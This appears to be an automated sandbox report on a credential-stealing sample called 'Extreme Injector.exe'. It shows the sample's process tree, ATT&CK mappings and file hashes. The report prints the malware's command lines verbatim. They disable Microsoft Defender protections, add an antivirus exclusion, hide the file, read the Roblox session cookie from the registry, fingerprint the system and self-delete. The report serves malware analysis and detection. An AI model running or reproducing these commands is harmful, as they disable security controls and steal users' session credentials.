        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1048
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        11⤵
        Views/modifies file attributes
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:2740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:1888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:2044
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2260
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        9⤵
        Executes dropped EXE
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        8⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        7⤵
        Executes dropped EXE
        
        PID:1728
      - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:556
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        7⤵
        Views/modifies file attributes
        
        PID:764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:2548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:772
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1584
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2812
    - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        5⤵
        Executes dropped EXE
        
        PID:2264
  - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
      4⤵
      Executes dropped EXE
      PID:2744
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
    3⤵
    - Executes dropped EXE
    PID:2868
- C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:2792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1724
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:348
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1716
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1616
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cdutk8k1YZzJmDP\Display\Display.png

Filesize
371KB

MD5
9fbfd732fc2b38e845e7e0b1f639c83a

SHA1
b307f3b9a5bffe676e7b699ee048fdbf424819cf

SHA256
7c3620ac37111409ab535fe5598e21847e9ef1869002d8837fa232a3559ab5f8

SHA512
0921c6d308df33dacc67a10e64f79b9e9161e7e19fca2dc0bc5880fc0d41be97f73b00ee1b739c4e2407d3c865661cfb09632351e3cda862708395b3f3bd7c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\E83iWKM6FWsEP8b

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe

Filesize
231KB

MD5
7d4400842d0ded3544bc7892c765816d

SHA1
c5a12688240f8db93e7482d16d145802445bfd71

SHA256
8b30696e9259851325272d57b9452ac2f6037231f1c6895658efb57e0445d064

SHA512
c6ba7dca5825784b680550d2cbc6528bcb0a5c1b6fbf2a65b2c54112a3c39858e01abb58915ff89c9c0011aa4200257659d516de6abd1f1d71e2eca0cadb065a

Download Submit
C:\Users\Admin\AppData\Local\Temp\xWQXyIh9CKSDPm0

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fce51e5c8ab7a3c023bdec2c512fef0e

SHA1
742eaf3540d0570eadb404c532b369ce8941d307

SHA256
518522c519bc27b8d9f31c037397328a42448617bf5f0b2a2d0a2765ccce8489

SHA512
ddebc107c7bdd3fa025991bb3cb0f995561930cbd3701323506c3acf3a2e6eedfa63c21723422213038848a45a586934e821d6c8543ca21363c8330b5ef06c12

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dbfc2a7935a4b757993bef124d4d8189

SHA1
803b7b2da5523d31f53694ad8ce1d7f2b4f4527e

SHA256
ba79c5bd388fa21e3e08a5751703571e7692a15b4a4ee3156871e523184d1be9

SHA512
894eca7e5e13200eec465d1b6b436e7fa7e996e9d4bf63875e194d1d9a5758d52076689ad64a37fe0a4133b54475aa878ef5994d0835af5ecf8dcb68f5edd25c

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
memory/556-61-0x0000000000EA0000-0x0000000000EE0000-memory.dmp

Filesize
256KB

Download
memory/768-69-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/1048-109-0x0000000000060000-0x00000000000A0000-memory.dmp

Filesize
256KB

Download
memory/1380-589-0x00000000010C0000-0x0000000001100000-memory.dmp

Filesize
256KB

Download
memory/1428-484-0x0000000000FE0000-0x0000000001020000-memory.dmp

Filesize
256KB

Download
memory/1464-9-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/1464-59-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/1464-8-0x00000000001B0000-0x00000000001F0000-memory.dmp

Filesize
256KB

Download
memory/1716-55-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1740-519-0x0000000001220000-0x0000000001260000-memory.dmp

Filesize
256KB

Download
memory/1800-624-0x0000000001270000-0x00000000012B0000-memory.dmp

Filesize
256KB

Download
memory/1880-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp

Filesize
4KB

Download
memory/1880-10-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/1880-5-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/1880-1-0x000000013FD00000-0x000000013FE6C000-memory.dmp

Filesize
1.4MB

Download
memory/2288-449-0x0000000000F70000-0x0000000000FB0000-memory.dmp

Filesize
256KB

Download
memory/2448-200-0x0000000001350000-0x0000000001390000-memory.dmp

Filesize
256KB

Download
memory/2596-25-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2596-24-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2824-154-0x00000000002C0000-0x0000000000300000-memory.dmp

Filesize
256KB

Download
memory/2896-414-0x00000000002E0000-0x0000000000320000-memory.dmp

Filesize
256KB

Download
memory/2936-17-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/2936-16-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2964-554-0x00000000002B0000-0x00000000002F0000-memory.dmp

Filesize
256KB

Download
memory/3020-691-0x0000000000270000-0x00000000002B0000-memory.dmp

Filesize
256KB

Download
memory/3036-659-0x0000000000080000-0x00000000000C0000-memory.dmp

Filesize
256KB

Download